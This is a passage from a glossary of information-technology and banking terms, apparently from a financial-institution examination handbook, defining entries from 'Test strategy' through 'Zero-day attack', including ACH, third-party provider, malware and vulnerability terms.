testing process. Test strategy - Testing strategies establish expectations for individual business lines across the testing life cycle of planning, execution, measurement, reporting, and test process improvement. Testing strategies include the testing scope and objectives, which clearly define what functions, systems, or processes are going to be tested and what will constitute a successful test.Third-party provider - Any type of company, including affiliated entities, non-affiliated entities, and alliances of companies providing products and services to a financial institution. Other terms used to describe service providers include subcontractors, external service providers, application service providers, and outsourcers. Also called a third-party service provider.Third-party relationship - Any business arrangement between a financial institution and another entity, by contract or otherwise. Third-party sender - A special subset of a technology service provider that is authorized to transmit ACH files on behalf of an originator. Typically, the ODFI must rely upon warranties by the third- party sender regarding the originators’ identity and credit worthiness, which places additional risks on the ODFI.Third-party service provider - Any type of company, including affiliated entities, non-affiliated entities, and alliances of companies providing products and services to the financial institution. Other terms used to describe service providers include subcontractors, external service providers, application service providers, and outsourcers. Third-party service provider (TPSP)(For ACH) - A third party, other than the ODFI or RDFI, that performs any function on behalf of the ODFI or the RDFI related to ACH processing. These functions would include the creation and sending of ACH files or acting as a sending or receiving point on behalf of a participating depository financial institution. Threat intelligence - The acquisition and analysis of information to identify, track, and predict cyber capabilities, intentions, and activities that offer courses of action to enhance decision-making. Threat modeling - A structured approach that enables an institution to aggregate and quantify potential threats. In the context of application development, threat modeling can be used to capture, organize, and analyze all of the threat information of an application and its environment that affects application security. It is used to enable informed decision-making about application security and helps to produce and rank a list of security improvements.Token - A small device with an embedded computer chip that can be used to store and transmit electronic information. A soft token is a software-based token.Tokenization - The process of substituting a sensitive data element with a surrogate value, referred to as a token.Topology - A description of any kind of locality in terms of its physical layout. In the context of communication networks, a topology describes pictorially the configuration or arrangement of a network, including its nodes and connecting communication lines.Total cost of ownership (TCO) - The true cost of ownership of a computer or other technology system that includes original cost of the computer and software, hardware and software upgrades, maintenance, technical support, and training.Transaction testing - A testing activity designed to validate the continuity of business transactions and the replication of associated data. Trojan horse - Malicious code that is hidden in software that has an apparently beneficial or harmless use.Truncating bank (Check 21) - The financial institution that truncates the original check. If a person other than a financial institution truncates the original check, the truncating bank is the first financial institution that transfers, presents, or returns, in lieu of such original check, a substitute check or, by agreement with the recipient, information relating to the original check (including data taken from the MICR line of the original check or an electronic image of the original check), whether with or without the subsequent delivery of the original check.Trusted platform module - An international standard for a secure crypto processor that is a dedicated microprocessor designed to secure hardware by integrating cryptographic keys into devices.Trusted zone - A channel in which the end points are known and data integrity is protected in transit. Depending on the communications protocol used, data privacy may be protected in transit. Examples include secure socket layer, internet protocol security and a secure physical connection. Two-way polling - An emergency notification system that allows management to ensure that all employees are contacted and have confirmed delivery of pertinent messages.UUltra forward service - This service allows control over the re-routing of incoming phone calls to pre-determined alternate locations in the event of a telecommunications outage.UPS - Uninterruptible power supply. A device that allows your computer to keep running for at least a short time when the primary power source is lost. A UPS may also provide protection from power surges. A UPS contains a battery that "kicks in" when the device senses a loss of power from the primary source allowing the user time to save any data they are working on and to exit before the secondary power source (the battery) runs out. When power surges occur, a UPS intercepts the surge so that it doesn't damage your computer. URL - Abbreviation for “Uniform (or Universal) Resource Locator.” A way of specifying the location of publicly available information on the Internet, in the form: protocol://machine:port number/filename. Often the port number and/or filename are unnecessary.USA Patriot Act - The USA PATRIOT Act (Uniting and Strengthening America by Providing Appropriate Tools Required to Intercept and Obstruct Terrorism Act of 2001 (Public Law Pub.L. 107-56), commonly known as the "Patriot Act", was enacted by Congress to deter and punish terrorist acts in the United States and around the world by enhancing the law enforcement investigatory tools of both domestic law enforcement and foreign intelligence agencies.US-CERT - The U.S. Computer Emergency Readiness Team, part of the U.S. Department of Homeland Security’s National Cybersecurity and Communications Integration Center. US-CERT is a partnership between the Department of Homeland Security and the public and private sectors, established to protect the nation’s Internet infrastructure. US-CERT coordinates defense against and responses to cyber attacks across the nation. User Identification - The process, control, or information by which a user identifies himself or herself to the system as a valid user (as opposed to authentication).Utility - A program used to configure or maintain systems, or to make changes to stored or transmitted data.Utility programs - A program used to configure or maintain systems, or to make changes to stored or transmitted data.VVESDA - Very early smoke detection alert. A system that samples the air on a continuing basis and can detect fire at the pre-combustion stage.Virtual machine - A software emulation of a physical computing environment. Virtual Mall - An Internet website offering products and services from multiple vendors or suppliers.Virtual payment card - A controlled way of making payments by generating a unique credit card number to settle a specific transaction typically online. Also referred to as single-use credit cards. Virtual private network (VPN) - A computer network that uses public telecommunication infrastructure, such as the Internet, to provide remote offices or individual users with secure access to their organization's network. Virus - Malicious code that replicates itself within a computer.VLAN - Virtual local area network.Voice over Internet Protocol (VoIP) - The transmission of voice telephone conversations using the Internet or Internet Protocol networks.VOIP - Voice over Internet protocol. A term used in IP telephony for a set of facilities for managing the delivery of voice information using the Internet Protocol. Vulnerability - A hardware, firmware, or software flaw that leaves an information system open to potential exploitation; a weakness in automated system security procedures, administrative controls, physical layout, internal controls, etc., that could be exploited to gain unauthorized access to information or to disrupt critical processing. Vulnerability Analysis - Systematic examination of an information system or product to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation.Vulnerability Scanning - Systematic examination of systems to determine the adequacy of security measures, identify security deficiencies, and provide data from which to predict the effectiveness of proposed security measures.WWalk-through drill/simulation test - This test represents a preliminary step in the overall testing process that may be used for training employees but not as a preferred testing methodology. During this test, participants choose a specific scenario and apply the BCP to it. Wallet card - Portable information cards that provide emergency communications information for customers and employees. Warehouse attack - The compromise of systems that store authenticators.WEB SEC code - An ACH debit entry initiated by an originator resulting from the receiver’s authorization through the Internet to make a transfer of funds from a consumer account of the receiver.Weblinking - The use of hyperlinks to direct users to webpages of other entities.Website - A webpage or set of webpages designed, presented, and linked together to form a logical information resource and/or transaction initiation function.Website hosting - The service of providing ongoing support and monitoring of an Internet-addressable computer that stores webpages and processes transactions initiated over the Internet.White-hat hacking - The specialization of penetration testing and other testing methodologies to review the security of an institution’s information systems by determining flaws and vulnerabilities. Also called ethical hacking.Whitelist - A list of trusted entities. Wide-scale disruption - An event that disrupts business operations in a broad geographic area. Wipe - Removal of data from a device.Wireless application protocol (WAP) - A data transmission standard to deliver wireless markup language (WML) content.Wireless communication - The transfer of signals from place to place without cables, usually using infrared light or radio waves.Wireless gateway server - A computer (server) that transmits messages between a computer network and a cellular telephone or other wireless access device. Wireless payment technology - The use of different core technologies to exchange payment credentials and authorization between the mobile device and the payment recipient. Examples include: near field communication, image based, carrier-based, mobile P2P, etc.Wireless phone - See "Cellular Telephone".Work program - A series of specific, detailed steps to achieve an audit objective. Work transfer - Work-transfer is a process whereby the staff located at a recovery site accepts the workload of staff located at a primary production site, and a data center located at a recovery site accepts the workload of the primary data processing site. Workstation - Any computer connected to a local-area network. Worm - A self-replicating malware computer program. It uses a computer network to send copies of itself to other nodes (computers on the network) and it may do so without any user intervention. This is primarily because of security vulnerabilities on the target computers. WORM (Acronym) - Write once, read many times. A type of optical disk where a computer can save information once, can then read that information, but cannot change it.XXML - XML (Extensible Markup Language) is a ”metalanguage” – a language for describing other languages – which lets you design your own customized markup languages for different types of documents. It is designed to improve the functionality of the Web by providing more flexible and adaptable information identification.ZZero-day attack - An attack on a piece of software that has a vulnerability for which there is no known patch.